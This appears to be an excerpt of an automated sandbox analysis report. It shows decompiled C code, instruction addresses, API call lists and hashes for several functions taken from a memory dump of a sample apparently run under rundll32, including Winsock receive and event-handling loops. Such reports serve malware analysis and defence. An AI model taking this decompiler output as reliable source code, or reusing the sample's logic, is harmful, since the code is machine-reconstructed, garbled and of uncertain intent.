                                                            • Opcode ID: 8e8bef042a3eeae6bcef593c6ba87c148db725d12f6153c81a4d959f31dc03df
                                                            • Instruction ID: e25a4ee5a019a940299c6a328658dc1ec0a3bf7688a9f51e0cbf68071058c292
                                                            • Opcode Fuzzy Hash: 8e8bef042a3eeae6bcef593c6ba87c148db725d12f6153c81a4d959f31dc03df
                                                            • Instruction Fuzzy Hash: D651F272710A16AFEB258FA4CC48EBB77A9EB90754F154628FC46D6240FB34FC40C698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04653680(void* __ecx, intOrPtr _a8, void* _a12, signed int _a16, intOrPtr _a20) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t26;
                                                            				void* _t28;
                                                            				long _t29;
                                                            				void* _t30;
                                                            				intOrPtr _t32;
                                                            				void* _t37;
                                                            				long _t49;
                                                            				void* _t54;
                                                            				signed int _t56;
                                                            				long _t58;
                                                            				void* _t68;
                                                            				void* _t70;
                                                            				void* _t77;
                                                            				void* _t81;
                                                            
                                                            				_t26 = _a20;
                                                            				_t54 = __ecx;
                                                            				if(_t26 == 0) {
                                                            					_t56 = _a16;
                                                            					_t70 = _a12;
                                                            					if(_t56 != 0 ||  *((intOrPtr*)(_t70 + 0x18)) == 2) {
                                                            						 *(_t70 + 0x1c) = _t56;
                                                            						_t28 =  *((intOrPtr*)(_t70 + 0x18)) - 2;
                                                            						if(_t28 == 0) {
                                                            							_t29 = E04653800(_t54, _t54, _t68, _t70, _t77, _t56, _a8, _t70);
                                                            							goto L23;
                                                            						}
                                                            						_t30 = _t28 - 1;
                                                            						if(_t30 == 0) {
                                                            							_t58 =  ~_t56;
                                                            							_t32 =  *((intOrPtr*)(_t54 + 8));
                                                            							if(_t32 == 0) {
                                                            								_t24 = _a8 + 0x44; // 0x44
                                                            								InterlockedExchangeAdd(_t24, _t58);
                                                            								E04652150(_t54, _a8, _t70);
                                                            								return E046547C0(_t54, _t54, _t68, _t70, _a8, _t78);
                                                            							} else {
                                                            								_t37 = _t32 - 1;
                                                            								if(_t37 == 0) {
                                                            									_t22 = _a8 + 0x44; // 0x44
                                                            									InterlockedExchangeAdd(_t22, _t58);
                                                            									E04652150(_t54, _a8, _t70);
                                                            									return E04654900(_t54, _t54, _t68, _t70, _a8, _t79);
                                                            								} else {
                                                            									_t29 = _t37 - 1;
                                                            									if(_t29 != 0) {
                                                            										goto L23;
                                                            									}
                                                            									_t20 = _a8 + 0x40; // 0x40
                                                            									InterlockedExchangeAdd(_t20, _t58);
                                                            									return E04652150(_t54, _a8, _t70);
                                                            								}
                                                            							}
                                                            						} else {
                                                            							_t29 = _t30 - 1;
                                                            							if(_t29 != 0) {
                                                            								goto L23;
                                                            							}
                                                            							return E046538F0(_t54, _t56, _a8, _t70);
                                                            						}
                                                            					} else {
                                                            						E04652920(__ecx, _a8, 1, 0, 0);
                                                            						_t29 = E0464C930(_t54 + 0xb0, _t70);
                                                            						if(_t29 != 0) {
                                                            							L23:
                                                            							return _t29;
                                                            						}
                                                            						return HeapFree( *( *(_t70 + 0x14)), _t29, _t70);
                                                            					}
                                                            				} else {
                                                            					_t81 = _a12;
                                                            					if(_t26 != 0x2736 && _t26 != 0x3e3) {
                                                            						E04652920(__ecx, _a8, 2,  *((intOrPtr*)(_t81 + 0x18)), _t26);
                                                            					}
                                                            					if( *((intOrPtr*)(_t81 + 0x18)) != 3) {
                                                            						L6:
                                                            						_t49 = E0464C930(_t54 + 0xb0, _t81);
                                                            						if(_t49 != 0) {
                                                            							goto L24;
                                                            						} else {
                                                            							return HeapFree( *( *(_t81 + 0x14)), _t49, _t81);
                                                            						}
                                                            					} else {
                                                            						_t49 = InterlockedDecrement(_t81 + 0x28);
                                                            						if(_t49 != 0) {
                                                            							L24:
                                                            							return _t49;
                                                            						} else {
                                                            							goto L6;
                                                            						}
                                                            					}
                                                            				}
                                                            			}




















                                                            0x04653683
                                                            0x04653687
                                                            0x0465368c
                                                            0x046536ec
                                                            0x046536f0
                                                            0x046536f5
                                                            0x04653738
                                                            0x0465373b
                                                            0x0465373e
                                                            0x046537ea
                                                            0x00000000
                                                            0x046537ea
                                                            0x04653744
                                                            0x04653747
                                                            0x04653768
                                                            0x0465376a
                                                            0x0465376d
                                                            0x046537c1
                                                            0x046537c5
                                                            0x046537cf
                                                            0x046537e0
                                                            0x0465376f
                                                            0x0465376f
                                                            0x04653772
                                                            0x0465379b
                                                            0x0465379f
                                                            0x046537a9
                                                            0x046537ba
                                                            0x04653774
                                                            0x04653774
                                                            0x04653777
                                                            0x00000000
                                                            0x00000000
                                                            0x0465377d
                                                            0x04653781
                                                            0x04653794
                                                            0x04653794
                                                            0x04653772
                                                            0x04653749
                                                            0x04653749
                                                            0x0465374c
                                                            0x00000000
                                                            0x00000000
                                                            0x04653762
                                                            0x04653762
                                                            0x046536fd
                                                            0x04653708
                                                            0x04653714
                                                            0x0465371b
                                                            0x046537ef
                                                            0x00000000
                                                            0x046537ef
                                                            0x04653732
                                                            0x04653732
                                                            0x0465368e
                                                            0x0465368e
                                                            0x04653696
                                                            0x046536a8
                                                            0x046536a8
                                                            0x046536b1
                                                            0x046536c5
                                                            0x046536cc
                                                            0x046536d3
                                                            0x00000000
                                                            0x046536d9
                                                            0x046536e9
                                                            0x046536e9
                                                            0x046536b3
                                                            0x046536b7
                                                            0x046536bf
                                                            0x046537f3
                                                            0x046537f3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046536bf
                                                            0x046536b1

                                                            APIs
                                                            • InterlockedDecrement.KERNEL32(?), ref: 046536B7
                                                            • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,?,04653568,?,?,?,?,00000000), ref: 046536E0
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000001,00000000,00000000,?,?,00000000,?,04653568,?,?,?), ref: 04653728
                                                            • InterlockedExchangeAdd.KERNEL32(00000040,?), ref: 04653781
                                                              • Part of subcall function 04652150: SetLastError.KERNEL32(00000000,?,00000000,?,?,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 0465216D
                                                              • Part of subcall function 04652150: InterlockedDecrement.KERNEL32(00000028), ref: 046521E6
                                                              • Part of subcall function 04652150: HeapFree.KERNEL32(?,00000000,00000000,00000000,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 04652207
                                                            • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 0465379F
                                                            • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 046537C5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$ExchangeFreeHeap$CriticalDecrementEnterSection$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1561599947-0
                                                            • Opcode ID: df6412c463660c1970ef46bfdb595a8c380f782a5a3d0ff7e21ea37daea34a81
                                                            • Instruction ID: 191d07a5fdfe0e02279b4367ecb7dcbe5d4aba81b58603709d2da03f121bc905
                                                            • Opcode Fuzzy Hash: df6412c463660c1970ef46bfdb595a8c380f782a5a3d0ff7e21ea37daea34a81
                                                            • Instruction Fuzzy Hash: E841A473200215ABDF249EA9EC88E9B776CEB95761F00012EFF06C6760EA31F454DB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 23%
                                                            			E046556C0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* _a4, intOrPtr* _a8) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				intOrPtr* _v24;
                                                            				void* _v28;
                                                            				intOrPtr* _v32;
                                                            				signed int _t40;
                                                            				intOrPtr _t42;
                                                            				long _t45;
                                                            				intOrPtr _t51;
                                                            				intOrPtr _t53;
                                                            				void* _t56;
                                                            				intOrPtr _t57;
                                                            				intOrPtr _t58;
                                                            				intOrPtr _t60;
                                                            				void* _t64;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr* _t74;
                                                            				void* _t75;
                                                            				void* _t77;
                                                            				void* _t81;
                                                            				intOrPtr* _t82;
                                                            				struct _CRITICAL_SECTION* _t83;
                                                            				signed int _t84;
                                                            
                                                            				_t65 = __ecx;
                                                            				_t40 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t40 ^ _t84;
                                                            				_t81 = _a4;
                                                            				_t64 = __edx;
                                                            				_t74 = _a8;
                                                            				_t77 = 0;
                                                            				_v24 = __ecx;
                                                            				_v20 = _t81;
                                                            				_v32 = _t74;
                                                            				_v28 = 0;
                                                            				while( *((intOrPtr*)(_t64 + 0x4c)) == 0) {
                                                            					_t51 =  *_t74;
                                                            					if(_t51 == 0 || _t51 == 1) {
                                                            						_t82 = _t81 + 0x1c;
                                                            						_t53 =  *((intOrPtr*)( *_t65 + 0xcc))();
                                                            						_t77 = 0;
                                                            						 *_t82 = _t53;
                                                            						_v16 = 0;
                                                            						_v12 = 0;
                                                            						_t56 = _v20;
                                                            						__imp__WSARecv( *((intOrPtr*)(_t56 + 0x34)), _t82, 1,  &_v12,  &_v16, 0, 0);
                                                            						if(_t56 != 0xffffffff) {
                                                            							_t57 = _v12;
                                                            							if(_t57 == 0) {
                                                            								_t77 = 0x2775;
                                                            								goto L9;
                                                            							} else {
                                                            								 *_t82 = _t57;
                                                            								goto L10;
                                                            							}
                                                            						} else {
                                                            							__imp__#111();
                                                            							_t77 = _t56;
                                                            							L9:
                                                            							if(_t77 != 0) {
                                                            								_t65 = _v24;
                                                            								_t81 = _v20;
                                                            								_t74 = _v32;
                                                            							} else {
                                                            								L10:
                                                            								_t58 = 0xff;
                                                            								_v12 = 0xff;
                                                            								if( *((intOrPtr*)(_t64 + 0x30)) != 0) {
                                                            									_t83 = _t64 + 0x54;
                                                            									EnterCriticalSection(_t83);
                                                            									if( *((intOrPtr*)(_t64 + 0x30)) != 0) {
                                                            										SetLastError(0);
                                                            										_t75 = _v20;
                                                            										_v12 =  *((intOrPtr*)( *_v24 + 0xe8))(_t64,  *((intOrPtr*)(_t75 + 0x20)),  *((intOrPtr*)(_t75 + 0x1c)));
                                                            									}
                                                            									LeaveCriticalSection(_t83);
                                                            									_t58 = _v12;
                                                            								}
                                                            								_t74 = _v32;
                                                            								_t65 = _v24;
                                                            								_t81 = _v20;
                                                            								 *_t74 = _t58;
                                                            								_t60 = _v28 + 1;
                                                            								_v28 = _t60;
                                                            								if(_t60 < 0x1e) {
                                                            									continue;
                                                            								} else {
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					break;
                                                            				}
                                                            				_t42 =  *_t74;
                                                            				if(_t42 == 0 || _t42 == 1) {
                                                            					if(_t77 == 0 || _t77 == 0x2733) {
                                                            						return E04655AFE(_v8 ^ _t84);
                                                            					} else {
                                                            						if(_t77 != 0x2775) {
                                                            							if(_t77 != 0x2736 && _t77 != 0x3e3) {
                                                            								_push(_t77);
                                                            								_push(4);
                                                            								_push(2);
                                                            								goto L26;
                                                            							}
                                                            						} else {
                                                            							_push(0);
                                                            							_push(0);
                                                            							_push(1);
                                                            							L26:
                                                            							_push(_t64);
                                                            							E04652920(_t65);
                                                            						}
                                                            						_t45 = E0464C930(_v24 + 0xb0, _t81);
                                                            						if(_t45 == 0) {
                                                            							HeapFree( *( *(_t81 + 0x14)), _t45, _t81);
                                                            						}
                                                            						goto L29;
                                                            					}
                                                            				} else {
                                                            					L29:
                                                            					return E04655AFE(_v8 ^ _t84);
                                                            				}
                                                            			}




























                                                            0x046556c0
                                                            0x046556c6
                                                            0x046556cd
                                                            0x046556d2
                                                            0x046556d5
                                                            0x046556d7
                                                            0x046556db
                                                            0x046556dd
                                                            0x046556e0
                                                            0x046556e3
                                                            0x046556e6
                                                            0x046556f0
                                                            0x046556fa
                                                            0x046556fe
                                                            0x0465570b
                                                            0x0465570e
                                                            0x04655714
                                                            0x04655716
                                                            0x0465571d
                                                            0x04655724
                                                            0x04655728
                                                            0x04655731
                                                            0x0465573a
                                                            0x04655746
                                                            0x0465574b
                                                            0x04655751
                                                            0x00000000
                                                            0x0465574d
                                                            0x0465574d
                                                            0x00000000
                                                            0x0465574d
                                                            0x0465573c
                                                            0x0465573c
                                                            0x04655742
                                                            0x04655756
                                                            0x04655758
                                                            0x046557bf
                                                            0x046557c2
                                                            0x046557c5
                                                            0x0465575a
                                                            0x0465575a
                                                            0x0465575e
                                                            0x04655763
                                                            0x04655766
                                                            0x04655768
                                                            0x0465576c
                                                            0x04655776
                                                            0x0465577a
                                                            0x04655780
                                                            0x04655795
                                                            0x04655795
                                                            0x04655799
                                                            0x0465579f
                                                            0x0465579f
                                                            0x046557a2
                                                            0x046557a5
                                                            0x046557a8
                                                            0x046557ab
                                                            0x046557b0
                                                            0x046557b1
                                                            0x046557b7
                                                            0x00000000
                                                            0x00000000
                                                            0x046557bd
                                                            0x046557b7
                                                            0x04655758
                                                            0x0465573a
                                                            0x00000000
                                                            0x046556fe
                                                            0x046557c8
                                                            0x046557cc
                                                            0x046557d5
                                                            0x04655852
                                                            0x046557df
                                                            0x046557e5
                                                            0x046557f5
                                                            0x046557ff
                                                            0x04655800
                                                            0x04655802
                                                            0x00000000
                                                            0x04655802
                                                            0x046557e7
                                                            0x046557e7
                                                            0x046557e9
                                                            0x046557eb
                                                            0x04655804
                                                            0x04655804
                                                            0x04655805
                                                            0x04655805
                                                            0x04655814
                                                            0x0465581b
                                                            0x04655824
                                                            0x04655824
                                                            0x00000000
                                                            0x0465581b
                                                            0x0465582a
                                                            0x0465582a
                                                            0x0465583c
                                                            0x0465583c

                                                            APIs
                                                            • WSARecv.WS2_32(?,-0000001B,00000001,00000001,?,00000000,00000000), ref: 04655731
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,00000001,00000000,?,?,?,046529B2), ref: 0465573C
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0465576C
                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,?,?,?,046529B2), ref: 0465577A
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04655799
                                                            • HeapFree.KERNEL32(?,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000001,00000000,?,?), ref: 04655824
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveRecv
                                                            • String ID:
                                                            • API String ID: 4219686125-0
                                                            • Opcode ID: c5e2f2dbab265634a3c8f2e691465454d35e179bb3ac69f11de40b16515a71fa
                                                            • Instruction ID: 11ad8f6c68463f4be4a2589bb2375cbad9b378e83c76daac4d52a4eeabed8cd2
                                                            • Opcode Fuzzy Hash: c5e2f2dbab265634a3c8f2e691465454d35e179bb3ac69f11de40b16515a71fa
                                                            • Instruction Fuzzy Hash: DF516E75A00215EBDB10CF99C888BAEBBB9FF48310F144469EC0AE7364F734A940CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 16%
                                                            			E0464F190(void* __ebx, void* __edi, intOrPtr* _a4) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				long _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				signed int _v56;
                                                            				signed int _v68;
                                                            				char _v112;
                                                            				intOrPtr _v132;
                                                            				signed int _t98;
                                                            				intOrPtr _t121;
                                                            				char* _t125;
                                                            				intOrPtr _t130;
                                                            				intOrPtr _t133;
                                                            				intOrPtr _t135;
                                                            				long _t137;
                                                            				signed char _t138;
                                                            				intOrPtr _t140;
                                                            				long _t141;
                                                            				intOrPtr _t154;
                                                            				intOrPtr _t157;
                                                            				intOrPtr* _t159;
                                                            				intOrPtr* _t161;
                                                            				intOrPtr* _t184;
                                                            				long _t185;
                                                            				signed char _t190;
                                                            				void* _t191;
                                                            				intOrPtr* _t192;
                                                            				intOrPtr* _t194;
                                                            				intOrPtr* _t197;
                                                            				signed int _t201;
                                                            				signed int _t202;
                                                            				signed int _t204;
                                                            
                                                            				_t98 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t98 ^ _t201;
                                                            				_t192 = _a4;
                                                            				GetCurrentThreadId();
                                                            				_t159 = _t192;
                                                            				 *((intOrPtr*)( *_t192 + 0xc0))(GetCurrentThreadId(), __edi, _t191, __ebx);
                                                            				_t154 =  *((intOrPtr*)(_t192 + 0x2c));
                                                            				_v24 =  *((intOrPtr*)(_t192 + 0x20));
                                                            				_v20 =  *((intOrPtr*)(_t192 + 0x174));
                                                            				_v16 =  *((intOrPtr*)(_t192 + 0x178));
                                                            				_v12 =  *((intOrPtr*)(_t192 + 0x17c));
                                                            				_t107 =  *(_t192 + 0x5c);
                                                            				_v28 = 1;
                                                            				if( *(_t192 + 0x5c) != 0) {
                                                            					L0465ED17(_t107);
                                                            					_t204 = _t204 + 4;
                                                            					 *(_t192 + 0x5c) = 0;
                                                            					 *(_t192 + 0x60) = 0;
                                                            					 *(_t192 + 0x64) = 0;
                                                            				}
                                                            				E0463ADA0(_t192 + 0x5c, _t154, _t159, 0);
                                                            				_t161 = _t192;
                                                            				if( *((intOrPtr*)( *_t192 + 0x24))() == 0) {
                                                            					L18:
                                                            					 *((intOrPtr*)( *_t192 + 0xc4))(GetCurrentThreadId());
                                                            					if(_v28 != 0 &&  *((intOrPtr*)( *_t192 + 0x24))() != 0) {
                                                            						 *((intOrPtr*)( *_t192 + 4))();
                                                            					}
                                                            					GetCurrentThreadId();
                                                            					return E04655AFE(_v8 ^ _t201);
                                                            				} else {
                                                            					_t184 = __imp__WSAWaitForMultipleEvents;
                                                            					do {
                                                            						_t121 =  *_t184(4,  &_v24, 0, 0xffffffff, 0);
                                                            						if(_t121 != 0) {
                                                            							if(_t121 != 1) {
                                                            								if(_t121 == 2) {
                                                            									_v28 = 0;
                                                            									goto L18;
                                                            								} else {
                                                            									if(_t121 != 3) {
                                                            										if(_t121 != 0xffffffff) {
                                                            											E04637AC0();
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											_t202 = _t204;
                                                            											_v68 =  *0x4684008 ^ _t202;
                                                            											_t194 = _t161;
                                                            											_t125 =  &_v112;
                                                            											_t185 = 1;
                                                            											__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t194 + 0x1c)),  *((intOrPtr*)(_t194 + 0x20)), _t125, _t184, _t192, _t201, 0x80004005);
                                                            											if(_t125 != 0xffffffff) {
                                                            												L33:
                                                            												if( *((intOrPtr*)( *_t194 + 0x40))() != 0) {
                                                            													L37:
                                                            													if(_t185 == 0) {
                                                            														goto L52;
                                                            													} else {
                                                            														if((_v56 & 0x00000001) != 0) {
                                                            															_t135 = _v52;
                                                            															if(_t135 != 0) {
                                                            																 *(_t194 + 0xc) = 1;
                                                            																_t185 = 0;
                                                            																 *(_t194 + 0x10) = 4;
                                                            																 *((intOrPtr*)(_t194 + 0x14)) = _t135;
                                                            																 *(_t194 + 0x18) = 1;
                                                            															} else {
                                                            																_t185 = E0464F540(_t194);
                                                            															}
                                                            														}
                                                            														if(_t185 == 0) {
                                                            															goto L52;
                                                            														} else {
                                                            															if((_v56 & 0x00000002) != 0) {
                                                            																_t133 = _v48;
                                                            																if(_t133 != 0) {
                                                            																	 *(_t194 + 0xc) = 1;
                                                            																	_t185 = 0;
                                                            																	 *(_t194 + 0x10) = 3;
                                                            																	 *((intOrPtr*)(_t194 + 0x14)) = _t133;
                                                            																	 *(_t194 + 0x18) = 1;
                                                            																} else {
                                                            																	_t185 = E0464F610(_t194);
                                                            																}
                                                            															}
                                                            															if(_t185 == 0 || (_v56 & 0x00000020) == 0) {
                                                            																goto L52;
                                                            															} else {
                                                            																_t130 = _v32;
                                                            																 *(_t194 + 0xc) = 1;
                                                            																 *(_t194 + 0x10) = 5;
                                                            																 *(_t194 + 0x18) = 1;
                                                            																if(_t130 != 0) {
                                                            																	 *((intOrPtr*)(_t194 + 0x14)) = _t130;
                                                            																	_t185 = 0;
                                                            																	goto L52;
                                                            																} else {
                                                            																	 *((intOrPtr*)(_t194 + 0x14)) = _t130;
                                                            																	return E04655AFE(_v12 ^ _t202);
                                                            																}
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													if(_t185 == 0) {
                                                            														L52:
                                                            														return E04655AFE(_v12 ^ _t202);
                                                            													} else {
                                                            														if((_v56 & 0x00000010) != 0) {
                                                            															_t137 =  &_v56;
                                                            															_push(_t137);
                                                            															L54();
                                                            															_t185 = _t137;
                                                            														}
                                                            														goto L37;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												__imp__#111(_t154);
                                                            												_t157 = _t125;
                                                            												_t138 = _v56;
                                                            												if((_t138 & 0x00000010) == 0) {
                                                            													if((_t138 & 0x00000020) == 0) {
                                                            														if((_t138 & 0x00000001) == 0) {
                                                            															_t138 = 3;
                                                            															_t190 =  !=  ? 3 : 0;
                                                            														} else {
                                                            															_t190 = 4;
                                                            														}
                                                            													} else {
                                                            														_t190 = 5;
                                                            													}
                                                            												} else {
                                                            													_t190 = 2;
                                                            												}
                                                            												__imp__WSAResetEvent( *((intOrPtr*)(_t194 + 0x20)));
                                                            												if(_t138 == 0) {
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													_push(_t202);
                                                            													_t140 = _v132;
                                                            													_push(_t194);
                                                            													_t197 = _t161;
                                                            													_t84 = _t140 + 0x14; // 0x8b0b75c0
                                                            													_t141 =  *_t84;
                                                            													if(_t141 != 0) {
                                                            														L57:
                                                            														 *(_t197 + 0xc) = 1;
                                                            														 *(_t197 + 0x10) = 2;
                                                            														 *(_t197 + 0x14) = _t141;
                                                            														 *(_t197 + 0x18) = 1;
                                                            														return 0;
                                                            													} else {
                                                            														__imp__WSAEventSelect( *((intOrPtr*)(_t197 + 0x1c)),  *((intOrPtr*)(_t197 + 0x20)), 0x23);
                                                            														if(_t141 != 0xffffffff) {
                                                            															 *(_t197 + 0x4c) = 1;
                                                            															 *(_t197 + 0x50) = 1;
                                                            															SetLastError(0);
                                                            															if( *((intOrPtr*)( *_t197 + 0x7c))() != 2) {
                                                            																return 1;
                                                            															} else {
                                                            																 *(_t197 + 0xc) = 0;
                                                            																 *(_t197 + 0x10) = 5;
                                                            																 *(_t197 + 0x14) = 0;
                                                            																 *(_t197 + 0x18) = 1;
                                                            																return 0;
                                                            															}
                                                            														} else {
                                                            															__imp__#111();
                                                            															goto L57;
                                                            														}
                                                            													}
                                                            												} else {
                                                            													 *(_t194 + 0x10) = _t190;
                                                            													_t185 = 0;
                                                            													 *((intOrPtr*)(_t194 + 0x14)) = _t157;
                                                            													 *(_t194 + 0xc) = 1;
                                                            													 *(_t194 + 0x18) = 1;
                                                            													goto L33;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											__imp__#111();
                                                            											 *(_t192 + 0xc) = 1;
                                                            											 *(_t192 + 0x10) = 0;
                                                            											 *((intOrPtr*)(_t192 + 0x14)) = _t121;
                                                            											 *(_t192 + 0x18) = 1;
                                                            											goto L18;
                                                            										}
                                                            									} else {
                                                            										if( *((intOrPtr*)( *_t192 + 0xbc))() == 0) {
                                                            											goto L18;
                                                            										} else {
                                                            											_t121 = E0464F540(_t192);
                                                            											goto L12;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								_t121 = E0464F610(_t192);
                                                            								goto L12;
                                                            							}
                                                            						} else {
                                                            							L23();
                                                            							L12:
                                                            							if(_t121 == 0) {
                                                            								goto L18;
                                                            							} else {
                                                            								goto L13;
                                                            							}
                                                            						}
                                                            						goto L61;
                                                            						L13:
                                                            						_t161 = _t192;
                                                            					} while ( *((intOrPtr*)( *_t192 + 0x24))() != 0);
                                                            					goto L18;
                                                            				}
                                                            				L61:
                                                            			}








































                                                            0x0464f196
                                                            0x0464f19d
                                                            0x0464f1a8
                                                            0x0464f1ac
                                                            0x0464f1b3
                                                            0x0464f1b5
                                                            0x0464f1be
                                                            0x0464f1c1
                                                            0x0464f1ca
                                                            0x0464f1d3
                                                            0x0464f1dc
                                                            0x0464f1df
                                                            0x0464f1e2
                                                            0x0464f1eb
                                                            0x0464f1ee
                                                            0x0464f1f3
                                                            0x0464f1f6
                                                            0x0464f1fd
                                                            0x0464f204
                                                            0x0464f204
                                                            0x0464f212
                                                            0x0464f219
                                                            0x0464f220
                                                            0x0464f2b5
                                                            0x0464f2c2
                                                            0x0464f2cc
                                                            0x0464f2dd
                                                            0x0464f2dd
                                                            0x0464f2e0
                                                            0x0464f2f4
                                                            0x0464f226
                                                            0x0464f226
                                                            0x0464f230
                                                            0x0464f23c
                                                            0x0464f240
                                                            0x0464f24e
                                                            0x0464f25c
                                                            0x0464f2ae
                                                            0x00000000
                                                            0x0464f25e
                                                            0x0464f261
                                                            0x0464f28c
                                                            0x0464f2fc
                                                            0x0464f301
                                                            0x0464f302
                                                            0x0464f303
                                                            0x0464f304
                                                            0x0464f305
                                                            0x0464f306
                                                            0x0464f307
                                                            0x0464f308
                                                            0x0464f309
                                                            0x0464f30a
                                                            0x0464f30b
                                                            0x0464f30c
                                                            0x0464f30d
                                                            0x0464f30e
                                                            0x0464f30f
                                                            0x0464f311
                                                            0x0464f31d
                                                            0x0464f322
                                                            0x0464f324
                                                            0x0464f328
                                                            0x0464f333
                                                            0x0464f33c
                                                            0x0464f39f
                                                            0x0464f3a8
                                                            0x0464f3c5
                                                            0x0464f3c7
                                                            0x00000000
                                                            0x0464f3cd
                                                            0x0464f3d1
                                                            0x0464f3d3
                                                            0x0464f3d8
                                                            0x0464f3e5
                                                            0x0464f3ec
                                                            0x0464f3ee
                                                            0x0464f3f5
                                                            0x0464f3f8
                                                            0x0464f3da
                                                            0x0464f3e1
                                                            0x0464f3e1
                                                            0x0464f3d8
                                                            0x0464f401
                                                            0x00000000
                                                            0x0464f403
                                                            0x0464f407
                                                            0x0464f409
                                                            0x0464f40e
                                                            0x0464f41b
                                                            0x0464f422
                                                            0x0464f424
                                                            0x0464f42b
                                                            0x0464f42e
                                                            0x0464f410
                                                            0x0464f417
                                                            0x0464f417
                                                            0x0464f40e
                                                            0x0464f437
                                                            0x00000000
                                                            0x0464f43f
                                                            0x0464f43f
                                                            0x0464f442
                                                            0x0464f449
                                                            0x0464f450
                                                            0x0464f459
                                                            0x0464f472
                                                            0x0464f475
                                                            0x00000000
                                                            0x0464f45b
                                                            0x0464f45d
                                                            0x0464f471
                                                            0x0464f471
                                                            0x0464f459
                                                            0x0464f437
                                                            0x0464f401
                                                            0x0464f3aa
                                                            0x0464f3ac
                                                            0x0464f477
                                                            0x0464f488
                                                            0x0464f3b2
                                                            0x0464f3b6
                                                            0x0464f3b8
                                                            0x0464f3bd
                                                            0x0464f3be
                                                            0x0464f3c3
                                                            0x0464f3c3
                                                            0x00000000
                                                            0x0464f3b6
                                                            0x0464f3ac
                                                            0x0464f33e
                                                            0x0464f33f
                                                            0x0464f345
                                                            0x0464f349
                                                            0x0464f34e
                                                            0x0464f359
                                                            0x0464f364
                                                            0x0464f36f
                                                            0x0464f374
                                                            0x0464f366
                                                            0x0464f366
                                                            0x0464f366
                                                            0x0464f35b
                                                            0x0464f35b
                                                            0x0464f35b
                                                            0x0464f350
                                                            0x0464f350
                                                            0x0464f350
                                                            0x0464f37a
                                                            0x0464f382
                                                            0x0464f489
                                                            0x0464f48e
                                                            0x0464f493
                                                            0x0464f494
                                                            0x0464f495
                                                            0x0464f496
                                                            0x0464f497
                                                            0x0464f498
                                                            0x0464f499
                                                            0x0464f49a
                                                            0x0464f49b
                                                            0x0464f49c
                                                            0x0464f49d
                                                            0x0464f49e
                                                            0x0464f49f
                                                            0x0464f4a0
                                                            0x0464f4a3
                                                            0x0464f4a6
                                                            0x0464f4a7
                                                            0x0464f4a9
                                                            0x0464f4a9
                                                            0x0464f4ae
                                                            0x0464f4c9
                                                            0x0464f4c9
                                                            0x0464f4d0
                                                            0x0464f4d7
                                                            0x0464f4dc
                                                            0x0464f4e5
                                                            0x0464f4b0
                                                            0x0464f4b8
                                                            0x0464f4c1
                                                            0x0464f4e8
                                                            0x0464f4f1
                                                            0x0464f4f8
                                                            0x0464f508
